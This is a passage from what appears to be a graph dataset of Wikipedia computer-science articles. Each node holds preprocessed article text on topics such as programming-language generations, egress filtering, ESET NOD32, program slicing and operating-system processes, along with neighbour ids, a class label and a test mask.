    "text": "Third-generation_programming_language:third-generation programming language third-generation programming language 3gl generational way categorize high-level computer programming languages assembly languages categorized second-generation programming languages machine-dependent 3gls much machine independent programmer-friendly includes features like improved support aggregate data types expressing concepts way favors programmer computer third generation language improves second generation language computer take care non-essential details 3gls abstract previous generations languages thus considered higher level languages first second generation counterparts first introduced late 1950s fortran algol cobol examples early 3gls popular general-purpose languages today c c++ c java basic pascal also third-generation languages although languages subdivided categories based contemporary traits 3gls support structured programming many support object-oriented programming traits like often used describe language rather 3gl programming language c fortran pascal enables programmer write programs less independent particular type computer languages considered high-level closer human languages machine languages hence require compilation interpretation contrast machine languages considered low-level designed executed physical hardware without translation required main advantage high-level languages low-level languages easier read write maintain ultimately programs written high-level language must translated machine language compiler directly behaviour interpreter programs could run different machines machine-independent new abstract languages developed however concept high low level languages become rather relative many early high level languages considered relatively low level comparison languages python ruby common lisp features fourth-generation programming languages",
    "neighbors": [
      512,
      9345,
      2691,
      9224,
      3594,
      2062,
      16,
      5651,
      6676,
      5527,
      9626,
      3613,
      9245,
      4770,
      5677,
      7343,
      5680,
      305,
      9780,
      1591,
      191,
      3904,
      10819,
      8262,
      9926,
      4042,
      8524,
      847,
      2002,
      5845,
      1879,
      10712,
      7421,
      8312,
      477,
      7395,
      4838,
      8554,
      9330,
      9331,
      3960,
      2043,
      2556,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4411,
    "label": 3,
    "text": "Leading_Edge_Hardware_Products:leading edge hardware products leading edge hardware products inc. computer manufacturer 1980s 1990s based canton massachusetts leading edge founded 1980 thomas shane michael shane outset pc peripherals company selling aftermarket products elephant memory systems brand floppy disk media elephant never forgets printer ribbons acting sole north american distributor/reseller printers japanese manufacturer c. itoh memorable popular low-end dot-matrix printer gorilla banana 1984 company sold computer aftermarket product line sales division dennison computer supplies division dennison manufacturing 1984 began use daewoo parts 1989 acquired daewoo part recovery chapter 11 bankruptcy shane declared costs legal dispute mitsubishi lead bankruptcy january 1990 daewoo hired al agbay veteran executive panasonic lead company chapter 11 bankruptcy three years followed agbay executive team repaid dealers approximately 16 million increased annual revenues 250 million contract dispute severed agbay daewoo relationship october 1995 daewoo sold company manuhold investment ag swiss electronics company leading edge sold 185,000 pc clones united states 1994 1995 sales fell 90,000 first half almost none second half 1997 company defunct first known computer produced leading edge model released 1982 1986 sold 1695 us monitor two floppy drives used intel 8088-2 processor running maximum 7.16 mhz 8 bit bus compared 6 mhz ibm pc-at 16 bit bus 'm stands mitsubishi parts provider began producing leading edge model june 1985 began use daewoo parts model described quality good price right consumer reports best buy ibm compatible using intel 8088 16 bit processor ibm pc two floppy disc drives 256k ram amber monitor machine sold 1495 us sold 125,000 first 13 months reduced price 1295 us ibm started supplying 20 meg hard drives standard newer pc-xt leading edge supplied 30 meg hard drive standard later released model d86 intel 8086 model d2 1988 65 mb hard drive 2495 us 10 mhz processor intel 80286 model d3 intel 80386 1993 leading edge marketed winpro series computers computers i486 intel 80486 processors low end model i486 sx25 processor—which lacked fpu i486 dx33 processor fpu computers 3.5 inch floppy 5.25 floppy 170mb hard drive 4mb ram could expanded 20mb needed windows 3.1 ms-dos 5.0 operating systems cost leading edge computer ranged 1299.99 2199.99 time 1994 leading edge marketed wintower 486 multimedia pc 66 mhz processor 8 mb ram 340 mb hard drive 2 floppies cd rom modem sound card monitor street price 2600 us one programs offered leading edge computers leading edge word processor described easy use created automatic backup copies loaded 256 k ram described large amount program memory floppy drives available storage introduced 1983 sold 1984 100 u.s. lewp called easy use word processor features bred newer systems great deal later automatically fixed transpositions run feature seen sophisticated contemporary word processing programs 1984 leading edge also released innovative database application called nutshell developed company called nashoba systems distributed leading edge nutshell earlier form program later released filemaker subsequently filemaker pro",
    "neighbors": [
      1549,
      8301,
      4642,
      1461
    ],
    "mask": "None"
  },
  {
    "node_id": 4412,
    "label": 1,
    "text": "James_Martin_(author):james martin author james martin 19 october 1933 – 24 june 2013 british information technology consultant author known work information technology engineering james martin born 19 october 1933 ashby-de-la-zouch england earned degree physics keble college oxford martin joined ibm 1959 since 1980s established several consultancy firms starting 1981 dixon doll tony carter established dmw doll martin worldwide london uk later renamed james martin associates jma partly bought texas instruments software 1991 later co-founded database design inc. ddi ann arbor michigan promulgate database design techniques develop tools help implement becoming market leader information technology engineering software ddi renamed knowledgeware eventually purchased fran tarkenton took public martin awarded honorary fellowship keble college oxford honorary doctor science degree university warwick july 2009 gave turing lecture 2008 according computerworld ’ 25th anniversary issue ranked fourth among 25 individuals influenced world computer science 1990s onwards martin lived private island agar ’ island bermuda died 24 june 2013 apparently swimming accident martin expert field systems design software development methodology information technology engineering computer-aided software engineering one first promote fourth-generation programming languages one main developers rapid application development methodology information technology engineering ite approach designing developing information systems somewhat chequered history follows two distinct threads said originated australia 1976 1980 appears first literature 1981 savant institute publication information engineering james martin clive finkelstein information technology engineering first provided data analysis database design techniques could used database administrators dbas systems analysts develop database designs systems based upon understanding operational processing needs organisations 1980s finkelstein thread evolved 1980 data processing dp -driven variant ie 1983 till 1986 ie evolved business-driven variant ie intended address rapidly changing business environment technical director charles m. richter 1983 1987 played significant role revamping ie methodology well designing ie software product user-data helped automate ie methodology opening way next generation information architecture martin thread information technology engineering strategy-driven outset 1983 focused possibility automating development process provision techniques business description could used populate data dictionary encyclopaedia could turn used source material code generation martin methodology provided foundation case computer-aided software engineering tool industry martin significant stakes least four case tool vendors—intech excelerator higher order software knowledgeware originally database design inc information engineering workbench james martin associates originally dmw headstrong original designers texas instruments ’ ca gen facility principal developers methodology end 1980s early 1990s martin thread incorporated rapid application development rad business process re-engineering bpr soon also entered object oriented field rapid application development rad term originally used describing software development process first developed successfully deployed mid-1970s d.dinadasa getahetta telephone co systems development center direction dan gielan following series remarkably successful implementations process gielan lectured extensively various forums methodology practice benefits process martin introduced approach 1991 martin ’ methodology involves iterative development construction prototypes recently term acronym come used broader generic sense encompasses variety techniques aimed speeding application development use web application frameworks types software frameworks rad approaches may entail compromises functionality performance exchange enabling faster development facilitating application maintenance 2004 martin donated £60m help establish james martin 21st century school 2010 renamed oxford martin school university oxford largest single donation university school aims formulate new concepts policies technologies make future better place 2009 martin pledged additional 50 million could matched donors condition met april 2010 martin wrote hundred books many best sellers information technology industry selection",
    "neighbors": [
      9345,
      11457,
      4483,
      8808,
      3529,
      4042,
      2283,
      4107,
      8780,
      7775,
      10061,
      11472,
      9112,
      10617,
      3323,
      284,
      511
    ],
    "mask": "Test"
  },
  {
    "node_id": 4413,
    "label": 1,
    "text": "IMO_number:imo number international maritime organization imo number unique reference ships registered ship owners management companies imo numbers introduced improve maritime safety security reduce maritime fraud consist three letters imo followed unique seven-digit numbers assigned international convention safety life sea solas 1987 imo adopted resolution a.600 15 aimed enhancement maritime safety pollution prevention prevention maritime fraud assigning ship permanent identification number imo number remains linked hull lifetime regardless changes names flags owners imo adopted existing unique 7-digit numbers applied ships lloyd register since 1969 modified 6-digit numbers introduced 1963 solas regulation xi/3 adopted 1994 came force 1 january 1996 made imo numbers mandatory applied cargo vessels least 300 gross tons gt passenger vessels least 100 gt solas convention cargo ships means ships passenger ships imo scheme however apply december 2002 diplomatic conference maritime security adopted number measures aimed enhancing security ships port facilities included modification solas regulation xi-1/3 require ships identification numbers permanently marked visible place either ship hull superstructure well internally ship certificates passenger ships also carry marking horizontal surface visible air may 2005 imo adopted new solas regulation xi-1/3-1 mandatory company registered owner identification number scheme entry force 1 january 2009 regulation provides every ship owner management company shall unique identification number amendments require numbers added relevant certificates documents international safety management code ism international ship port facility security code isps like imo ship identification number company identification number seven-digit number prefix imo example ship atlantic star imo 5304986 referred former ship manager pullmantur cruises ship management ltd imo 5364264 former owner pullmantur cruises empress ltd. imo identification numbers ships companies registered owners assigned ihs markit previously lloyd register-fairplay new vessels imo number assigned hull construction generally upon keel laying many vessels fall outside mandatory requirements solas numbers allocated lloyd register ihs markit numerical series including fishing vessels commercial yachts imo number made three letters imo followed seven-digit number consists six-digit sequential unique number followed check digit integrity imo number verified using check digit done multiplying first six digits factor 2 7 corresponding position right left rightmost digit sum check digit example imo 9074729 9× 7 0× 6 7× 5 4× 4 7× 3 2× 2 139 01718423143",
    "neighbors": [
      11369
    ],
    "mask": "Test"
  },
  {
    "node_id": 4414,
    "label": 4,
    "text": "Egress_filtering:egress filtering computer networking egress filtering practice monitoring potentially restricting flow information outbound one network another typically information private tcp/ip computer network internet controlled tcp/ip packets sent internal network examined via router firewall similar edge device packets meet security policies allowed leave – denied egress egress filtering helps ensure unauthorized malicious traffic never leaves internal network corporate network typical recommendations traffic except emerging select set servers would denied egress restrictions made select protocols http email dns allowed user workstations would need configured either manually via proxy auto-config use one allowed servers proxy corporate networks also typically limited number internal address blocks use edge device boundary internal corporate network external networks internet used perform egress checks packets leaving internal network verifying source ip address outbound packets within range allocated internal address blocks egress filtering may require policy changes administrative work whenever new application requires external network access reason egress filtering uncommon feature consumer small business networks",
    "neighbors": [
      2240,
      2947,
      8998,
      2887,
      6762,
      4272,
      4883,
      4725,
      953,
      5179,
      9181
    ],
    "mask": "Test"
  },
  {
    "node_id": 4415,
    "label": 0,
    "text": "IGlue:iglue iglue experimental database detailed search options containing entities information editing tool organizes interrelated images videos individuals institutions objects websites geographical locations cohesive data structures important components iglue system flexible database contains semantic elements entities relational connections in4 kft established august 2007 company specialised development online applications based university researches participation young university researchers power dream ventures financial investor",
    "neighbors": [
      1890,
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 4416,
    "label": 1,
    "text": "Cardinality_(data_modeling):cardinality data modeling database design cardinality fundamental principle one data aspect respect another critical feature relationship one must precise exact order explain aspect links together relational model tables related one-to-many many-to-many one-to-zero-or-one etc.. said cardinality given table relation another example consider database designed keep track hospital records database could many tables like model one-to-one relationship mostly used split table two order provide information concisely make understandable hospital example relationship could used keep apart doctors unique professional information administrative details data modeling collections data elements grouped data tables contain groups data field names called database attributes tables linked key fields primary key assigns field special order table example doctor last name field might assigned primary key doctor table people last name organized alphabetically according first three letters first name table also foreign key indicates field linked primary key another table complex data model involve hundreds related tables renowned computer scientist edgar f. codd created systematic method decompose organize relational databases codd steps organizing database tables keys called database normalization avoids certain hidden database design errors delete anomalies update anomalies real life process database normalization ends breaking tables larger number smaller tables real world data modeling critical data grows voluminous tables linked keys must used speed programmed retrieval data data model poorly crafted even computer applications system million records give end-users unacceptable response time delays reason data modeling keystone skills needed modern software developer entity–relationship model proposes technique produces entity–relationship diagrams erds employed capture information data model entity types relationships cardinality crow foot shows one-to-many relationship alternatively single line represents one-to-one relationship object-oriented application programming paradigm related database structure design uml class diagrams may used object modeling case object relationships modeled using uml associations multiplicity used associations denote cardinality examples",
    "neighbors": [
      2688,
      10632,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9397,
      9527,
      3768,
      3004,
      9661,
      9663,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 4417,
    "label": 3,
    "text": "Dataflow:dataflow dataflow term used computing various meanings depending application context term used context software architecture data flow relates stream processing reactive programming dataflow software paradigm based idea disconnecting computational actors stages pipelines execute concurrently dataflow also called stream processing reactive programming multiple data-flow/stream processing languages various forms see stream processing data-flow hardware see dataflow architecture alternative classic von neumann architecture obvious example data-flow programming subset known reactive programming spreadsheets user enters new values instantly transmitted next logical actor formula calculation distributed data flows also proposed programming abstraction captures dynamics distributed multi-protocols data-centric perspective characteristic data flow programming promotes high-level functional specifications simplifies formal reasoning system components hardware architectures dataflow major topic computer architecture research 1970s early 1980s jack dennis mit pioneered field static dataflow architectures designs use conventional memory addresses data dependency tags called static dataflow machines machines allow multiple instances routines executed simultaneously simple tags could differentiate designs use content-addressable memory called dynamic dataflow machines arvind use tags memory facilitate parallelism data flows around computer components computer gets entered input devices leave output devices printer etc. dataflow network network concurrently executing processes automata communicate sending data channels see message passing kahn process networks named gilles kahn processes determinate implies determinate process computes continuous function input streams output streams network determinate processes determinate thus computing continuous function implies behavior networks described set recursive equations solved using fixed point theory movement transformation data represented series shapes lines",
    "neighbors": [
      6536,
      9739,
      11406,
      7699,
      1051,
      3999,
      5029,
      6950,
      8624,
      8116,
      8252,
      2620,
      10819,
      3910,
      8523,
      5452,
      9932,
      1359,
      3159,
      7769,
      9179,
      2140,
      5090,
      8810,
      508,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 4418,
    "label": 3,
    "text": "Attack_of_the_Killer_Tomatoes_(1986_video_game):attack killer tomatoes 1986 video game attack killer tomatoes computer game released 1986 sinclair spectrum amstrad cpc msx based 1978 comedy film name player takes control wimp plasbot works tomato puree plant must rid plant mutated killer tomatoes referred title wimp plasbot checked 9:00 begin another day work discovered tomatoes mutated wimp must destroy killer tomatoes ensuring pizza parlours still supplied puree bouncing ones player must control wimp explores various isometric 3d rooms attempts destroy mutated killer tomatoes three different types tomato found factory killer tomatoes walk around legs square patterns kill wimp touch wimp must destroy tomatoes crushing hammer found somewhere factory second type tomato bounce wimp must stop bouncing squirting tomato sauce take crusher keep supply tomato puree third type tomato sit floor factory wimp touches cause time clock accelerate short clocking time reached killer tomatoes destroyed player loses punch cards found around factory give player extra time reviews fairly positive crash giving 89 sinclair rating 8/10 zx computing rating great crash said game despite awfulness movie name akt excellent game though owe quite lot previous releases rachael smith sinclair said ... converting film nominated worst vegetable movie time global created tie-in far better original deserved far better many superior films received zx computing said killer tomatoes quite complex professionally produced game keep occupied quite similarity knight lore inspired titles left feeling n't really offer anything n't seen",
    "neighbors": [
      10931,
      5820,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 4419,
    "label": 8,
    "text": "Web_Services_Invocation_Framework:web services invocation framework web services invocation framework wsif supports simple java api invoking web services matter services provided framework allows maximum flexibility invocation web services description language wsdl -described service using wsif wsdl become centerpiece integration framework accessing software running diverse platforms using widely varying protocols precondition software needs described using wsdl included description binding client wsif framework provider wsif defines comes packaged providers local java enterprise javabeans ejb java message service jms java ee connector architecture jca protocols means client define ejb java message service-accessible service directly wsdl binding access transparently using wsif using api one would use soap service local java class wsdl binding defines map abstract porttype real service format protocol example soap binding defines encoding style soapaction header namespace body targeturi forth wsdl allows multiple implementations web service multiple ports share porttype words wsdl allows interface bindings example soap iiop wsif provides api allow client code access available binding client code written porttype deployment configuration setting code choice port binding uses wsif uses providers support multiple wsdl bindings provider piece code supports wsdl extension allows invocation service particular implementation wsif providers use j2se jar service provider specification making discoverable runtime clients utilize new implementations delegate choice port infrastructure runtime allows implementation chosen basis quality service characteristics business policy wsif defines additional binding extensions enterprise javabean ejbs local java classes software accessible message queues using java message service jms api software invoked using java connector architecture also described wsdl wsif packaged providers allow transparent invocation software given corresponding wsdl description wsif enables developers interact abstract representations web services wsdl descriptions instead working directly simple object access protocol soap apis usual programming model wsif developers work programming model regardless web service implemented accessed wsif allows stubless completely dynamic invocation web service based upon examination meta-data service runtime also allows updated implementations binding plugged wsif runtime allows calling service defer choosing binding runtime finally wsif closely based upon wsdl invoke service described wsdl complicated enterprise software system consists various pieces software developed period tens years ejbs legacy apps accessed using java connector architecture soap services hosted external servers old code accessed messaging middleware – necessary write software applications use pieces useful things yet differences protocols mobility software etc get way software one uses moves different server code breaks soap libraries one uses change example one moves using apache soap apache axis – code breaks uses deprecated soap api something previously accessible ejb available messaging middleware via jms need fix code uses software one ejb offered soap service external clients using soap results performance penalty compared accessing ejb directly soap baseline protocol platform language independence n't java clients able take advantage fact software accessing really ejb java customers pay performance penalty since use soap accommodate non-java clients wsif fixes problems allowing wsdl used normalized description disparate software allows one access software manner independent protocol location whether soap ejb jms potentially .net software frameworks api centered around wsdl used access functionality lets one write code adapts changes easily separation api actual protocol also means flexibility switch protocols location etc without even recompile client code externally available soap service becomes available ejb one switch using rmi/iiop changing service description wsdl without make modification applications use service exploit wsdl extensibility capability offer multiple bindings service deciding binding runtime etc axis implementation soap includes server-side infrastructure deploying web service implementations routing soap messages clients implementations also implements jax-rpc specification invoking soap services wsif similar client piece axis used invoking services however wsif api wsdl-driven protocol independent allows protocol-specific code providers plugged invoking soap services wsif packaged axis provider uses axis apis i.e jax-rpc invocation wsif operates abstract level axis jax-rpc api invoking xml-based rpc services – essentially current scope limited invocation soap services wsif api invoking wsdl-described services whether happen soap services example wsif defines wsdl bindings ejbs enterprise software accessible using jms java connector architecture well local java classes described first-class wsdl services invoked using protocol-independent wsif api",
    "neighbors": [
      9988,
      8070,
      10377,
      7567,
      1296,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      5677,
      7983,
      4919,
      5047,
      4538,
      1851,
      3517,
      7485,
      7742,
      9789,
      7233,
      6338,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11105,
      11235,
      3558,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      7159,
      1913
    ],
    "mask": "None"
  },
  {
    "node_id": 4420,
    "label": 9,
    "text": "Program_slicing:program slicing computer programming program slicing computation set program statements program slice may affect values point interest referred slicing criterion program slicing used debugging locate source errors easily applications slicing include software maintenance optimization program analysis information flow control slicing techniques seeing rapid development since original definition mark weiser first slicing static i.e. applied source code information source code bogdan korel janusz laski introduced dynamic slicing works specific execution program given execution trace forms slicing exist instance path slicing based original definition weiser informally static program slice consists statements program p may affect value variable v statement x slice defined slicing criterion c= x v x statement program p v variable x static slice includes statements affect value variable v statement x possible input static slices computed backtracking dependencies statements specifically compute static slice x v first find statements directly affect value v statement x encountered recursively statement affect value v statement x compute slices variables z affect value v. union slices static slice x v example consider c program let compute slice write sum sum value sum directly affected statements sum sum w n 1 int sum 0 n 1 slice write sum sum union three slices int sum 0 statement dependencies fairly easy see slice sum sum w sum consists sum sum w int sum 0 two prior statements affect value sum sum sum w similarly slice sum sum w contains 1 n ++i slice sum sum w w contains statement int w 7 union statements executable code make slice executable slice merely add end brace loop declaration resulting static executable slice shown original code static executable slice criteria codice_1 sum new program shown fact static slicing techniques including weiser technique also remove codice_1 statement since statement codice_1 value codice_4 dependent statement often slice particular statement x include one variable v set variables statement x slice x v union slices criteria x v v variable set v. fast scalable yet slightly less accurate slicing approach extremely useful number reasons developers low cost practical means estimate impact change within minutes versus days important planning implementation new features understanding change related parts system also provide inexpensive test determine full expensive analysis system warranted fast slicing approach open new avenues research metrics mining histories based slicing slicing conducted large systems entire version histories practical time frames opens door number experiments empirical investigations previously costly undertake makes use information particular execution program dynamic slice contains statements actually affect value variable program point particular execution program rather statements may affected value variable program point arbitrary execution program example clarify difference static dynamic slicing consider small piece program unit iteration block containing if-else block statements codice_5 codice_6 blocks effect variable case static slicing since whole program unit looked irrespective particular execution program affected statements blocks would included slice case dynamic slicing consider particular execution program wherein codice_5 block gets executed affected statements codice_6 block get executed particular execution case dynamic slice would contain statements codice_5 block",
    "neighbors": [
      2675,
      5060
    ],
    "mask": "Test"
  },
  {
    "node_id": 4421,
    "label": 4,
    "text": "ESET_NOD32:eset nod32 eset nod32 antivirus commonly known nod32 antivirus software package made slovak company eset eset nod32 antivirus sold two editions home edition business edition business edition packages add eset remote administrator allowing server deployment management mirroring threat signature database updates ability install microsoft windows server operating systems acronym nod stands nemocnica na okraji disku hospital end disk pun related czechoslovak medical drama series nemocnice na kraji města hospital end city first version nod32 called nod-ice dos-based program created 1987 miroslav trnka peter paško time computer viruses started become increasingly prevalent pcs running dos due limitations os lack multitasking among others n't feature on-demand/on-access protection features current versions besides virus scanning cleaning functionality featured heuristic analysis increasing popularity windows environment advent 32-bit cpus shift pc market increasing popularity internet came need completely different antivirus approach well thus original program re-written christened nod32 emphasize radical shift previous version win32 system compatibility initially program gained popularity workers eastern european countries eset based slovakia though program abbreviation originally pronounced individual letters worldwide use program led common single-word pronunciation sounding like english word nod additionally 32 portion name anachronism release 64-bit version windows 7 era company reached 10000th update virus definitions june 25 2014 march 10 2010 eset released eset mail security microsoft exchange server contains antimalware antispam modules supports microsoft exchange 5.5 2000 2003 2007 2010 eset mobile security replacement eset mobile antivirus provided anti-malware antispam functionality eset mobile security contains features older product adds new anti-theft features sim locking remote wipe well security audit firewall versions windows mobile symbian os available september 2010 home enterprise users eset remote administrator central management console designed allow network administrators manage eset software across corporate network november 5 2007 eset released internet security suite eset smart security version 3.0 compete security suites companies mcafee symantec avg kaspersky eset smart security incorporates anti-spam bidirectional firewall along traditional anti-malware features eset nod32 antivirus march 2 2009 eset smart security version 4.0 released adding integration eset sysinspector support mozilla thunderbird windows live mail new self-defense module updated firewall module eset sysrescue wizard creating bootable cd usb flash drives initially compatibility problems eset smart security 4.0 windows vista service pack 2 remedied update august 17 2010 eset smart security version 4.2 released new features enhancements changes september 14 2011 eset smart security version 5.0 released january 15 2013 eset smart security version 6.0 released version included anti-theft feature tracking lost misplaced stolen laptop october 16 2013 eset smart security version 7.0 released offers enhanced operation memory scanning blocks misuses known exploits october 2 2014 eset smart security version 8.0 released adds exploit blocking java botnet protection october 13 2015 eset smart security version 9.0 released eset sysinspector diagnostic tool allows in-depth analysis various aspects operating system including running processes registry content startup items network connections anti-stealth technology used discover hidden objects rootkits master boot record boot sector registry entries drivers services processes sysinspector logs standard xml files submitted experts analysis two logs compared find set items common logs log file saved service script removing malicious objects computer eset sysrescue live linux-based bootable live cd/usb image used boot clean heavily infected computers independent installed operating system program offered free charge download updates network connection present eset released free standalone removers malware widespread mebroot june 1 2010 first release candidate eset file security microsoft windows server v4.3 made available public program updated version eset nod32 antivirus business edition designed microsoft windows server operating systems contains revised user interface automatic exclusions critical directories files unspecified optimizations operation servers april 22 2010 eset mobile security windows mobile symbian os went public beta home edition released september 2 2010 january 20 2011 business edition went beta april 29 2011 eset beta test version android released august 10 2011 release candidate made available december 2 2009 eset nod32 antivirus 4 mac os x desktop eset nod32 antivirus 4 linux desktop released public testing eset stated release automatically detects cleans cross-platform malware scans archives automatically scans removable media usb flash drives mounted performs real-time scanning provides reports offers gui similar microsoft windows version second beta test versions released january 9 2010 third june 10 2010 september 13 2010 eset released eset nod32 antivirus mac os x business edition announced release candidate eset cybersecurity mac os x september 24 2010 eset released release candidate eset cybersecurity mac os x january 21 2011 eset released release candidate eset nod32 antivirus linux desktop may 5 2011 eset released beta test version eset smart security 5.0 beta version adds parental control cloud-based file reputation service gamer mode hips improvements antispam firewall removable media control functions june 14 2011 eset released release candidate eset smart security version 5.0 august 5 2014 eset smart security version 8.0 public beta 1 released offers enhanced exploit blocking botnet detection eset mobile antivirus aimed protecting smartphones viruses spyware adware trojans worms rootkits unwanted software also provided antispam filtering sms messages versions windows mobile symbian os available eset discontinued eset mobile antivirus january 2011 provides eset mobile security free upgrade licensed users eset mobile antivirus 1 february 2010 eset discontinued version 2.7 nod32 antivirus previous version nod32 antivirus removed eset website including product pages e-store version 2.7 last version supporting microsoft 95/98/me novell netware operating systems virus signature database updates customer support discontinued february 1 2012 network nod32 clients update central mirror server network nod32 antivirus holds icsa labs certifications nod32 accumulated one hundred eleven vb100 awards virus bulletin failed receive award three times comparative report virus bulletin published 2 september 2008 nod32 detected 94.4 malware 94.7 spyware stood competitors like norton internet security zonealarm windows live onecare avira antivir rap averages quadrant december 2011 june 2012 virus bulletin found eset pretty much level 94 noted ability block spam phishing earning award award 19 antivirus companies able acquire 28 april 2008 robert vamosi cnet.com reviewed version 3.0 nod32 gave score 3.5/5 6 march 2009 seth rosenblatt download.com reviewed 4.0 version nod32 gave rating 4.6/5 15 september 2011 seth rosenblatt cnet reviewed 5.0 version nod32 gave rating 5/5",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      3981,
      3342,
      6797,
      10637,
      4883,
      3093,
      4374,
      11418,
      3739,
      1052,
      156,
      6431,
      2721,
      3620,
      2213,
      550,
      1318,
      5924,
      2601,
      6823,
      2859,
      3243,
      5677,
      6699,
      7983,
      8615,
      6834,
      4403,
      9523,
      10166,
      823,
      7739,
      7103,
      704,
      5057,
      7362,
      9537,
      10308,
      202,
      1355,
      1994,
      5069,
      8614,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      7515,
      8668,
      2654,
      9055,
      9569,
      11622,
      106,
      6762,
      6382,
      4464,
      9713,
      3955,
      6516,
      6643,
      10872,
      5754,
      9341,
      1150,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 4422,
    "label": 3,
    "text": "Michael_Jackson's_Moonwalker:michael jackson moonwalker michael jackson moonwalker name several video games based 1988 michael jackson film moonwalker u.s. gold published various games home computers released 1989 sega developed two similarly themed beat 'em video games 1990 one released arcades another released mega drive/genesis master system games stories loosely follow story film michael jackson must rescue kidnapped children evil mr. big incorporate synthesized versions musician songs versions game released popular 8-bit 16-bit home computers time developed two small software houses irish emerald software ltd american keypunch software published u.k. company u.s. gold game features four different levels first level top-down maze-style level next level similar gameplay riding motorcycle collecting tokens third level side-scrolling level based smooth criminal clip player collects ammunition shoots gangsters openings player character last level involves morphing robot shooting soldiers openings player controlling crosshair different home computer version arcade video game sega programming triumph international audiovisuals help jackson released sega system 18 hardware game suffered sega suicide battery arcade board battery accidentally otherwise renders game unplayable end lifespan arcade distinctively different gameplay computer console counterparts focusing beat 'em gameplay elements rather platform game essentially beat-em-up although jackson attacks magic powers instead physical contact ability shoot short-ranged magic power enemies magic power charged holding attack button increase range damage magic power close enemies jackson executes spinning melee attack using magic power cabinet supports three people play simultaneously three players play jackson dressed suit white player 1 red player 2 black player 3 jackson special attack termed dance magic three different dance routines may performed player starts one three attacks per credit depending machine set bubbles chimpanzee michael real-life pet appears level collected rescued chimp transforms michael robotic version pop singer ability shoot laser bursts missiles absorb significantly damage home versions game released sega mega drive/genesis master system home video game systems though gameplay completely different arcade version version also rated pegi release virtual console never materialized never specified version considered rerelease home console versions actually based evolved version home computer version game gameplay somewhat similar shinobi series contrast arcade version three-quarters view shooter/fighter type game game involves player controlling pop star quest save kids kidnapped mr. big game levels music borrowed film though many music tracks taken jackson thriller album well player ability destroy enemies making dance jackson become robot rescuing certain child grabbing comet falls sky gameplay focused finding children resemble katie movie scattered throughout level behind objects doors objects empty contain enemies jackson standard attack stylized high kick commonly incorporated dance routines player continues hold kick button moves jackson backwards performs moonwalk dance move critical reviews mixed positive sinclair compared spectrum version game gauntlet operation wolf saying well animated surprising amount fun megatech said megadrive version addictive platform game excellent graphics mega magazine placed game number 91 list best megadrive games time saying average jackson later would go cameo role sega space channel 5 music/rhythm games dreamcast playstation 2 jackson also appeared secret character",
    "neighbors": [
      9006,
      10316,
      6390
    ],
    "mask": "Test"
  },
  {
    "node_id": 4423,
    "label": 2,
    "text": "Process_(computing):process computing computing process instance computer program executed one many threads contains program code activity depending operating system os process may made multiple threads execution execute instructions concurrently computer program passive collection instructions process actual execution instructions several processes may associated program example opening several instances program often results one process executed multitasking method allow multiple processes share processors cpus system resources cpu core executes single task time however multitasking allows processor switch tasks executed without wait task finish depending operating system implementation switches could performed tasks perform input/output operations task indicates switched hardware interrupts common form multitasking time-sharing time-sharing method allow high responsiveness interactive user applications time-sharing systems context switches performed rapidly makes seem like multiple processes executed simultaneously processor seeming execution multiple processes simultaneously called concurrency security reliability modern operating systems prevent direct communication independent processes providing strictly mediated controlled inter-process communication functionality general computer system process consists said following resources operating system holds information active processes data structures called process control blocks subset resources typically least processor state may associated process threads operating systems support threads child processes operating system keeps processes separate allocates resources need less likely interfere cause system failures e.g. deadlock thrashing operating system may also provide mechanisms inter-process communication enable processes interact safe predictable ways multitasking operating system may switch processes give appearance many processes executing simultaneously parallel though fact one process executing one time single cpu unless cpu multiple cores multithreading similar technologies used usual associate single process main program child processes spin-off parallel processes behave like asynchronous subroutines process said resources image program memory one resource however multiprocessing systems many processes may run share reentrant program location memory process said image program processes often called tasks embedded operating systems sense process task something takes time opposed memory something takes space description applies processes managed operating system processes defined process calculi process requests something must wait blocked process blocked state eligible swapping disk transparent virtual memory system regions process memory may really disk main memory time note even portions active processes/tasks executing programs eligible swapping disk portions used recently parts executing program data physical memory associated process active operating system kernel allows multitasking needs processes certain states names states standardised similar functionality processes communicate called inter-process communication ipc processes frequently need communicate instance shell pipeline output first process need pass second one process preferred well-structured way using interrupts even possible two processes running different machines operating system os may differ one process therefore mediator called protocols needed early 1960s computer control software evolved monitor control software example ibsys executive control software time computers got faster computer time still neither cheap fully utilized environment made multiprogramming possible necessary multiprogramming means several programs run concurrently first one program ran single processor result underlying uniprocessor computer architecture shared scarce limited hardware resources consequently concurrency serial nature later systems multiple processors multiple programs may run concurrently parallel programs consist sequences instructions processors single processor run one instruction time impossible run programs time program might need resource input device large delay program might start slow operation sending output printer would lead processor idle unused keep processor busy times execution program halted operating system switches processor run another program user appear programs run time hence term parallel shortly thereafter notion program expanded notion executing program context concept process born also became necessary invention re-entrant code threads came somewhat later however advent concepts time-sharing computer networks multiple-cpu shared memory computers old multiprogramming gave way true multitasking multiprocessing later multithreading",
    "neighbors": [
      4107,
      6155,
      25,
      8219,
      6180,
      10278,
      8231,
      6184,
      10284,
      2113,
      8259,
      4173,
      6221,
      4178,
      86,
      8281,
      2140,
      10333,
      97,
      4194,
      10340,
      10344,
      8298,
      4205,
      2160,
      2168,
      2179,
      4238,
      10382,
      6296,
      2201,
      8344,
      10392,
      8352,
      2210,
      178,
      6329,
      8379,
      4286,
      2241,
      8386,
      2243,
      8388,
      2245,
      2248,
      2253,
      4308,
      2264,
      8410,
      6372,
      242,
      10485,
      249,
      8447,
      256,
      10499,
      6406,
      6415,
      4368,
      273,
      292,
      295,
      2345,
      2355,
      8499,
      309,
      8501,
      8502,
      4409,
      6459,
      318,
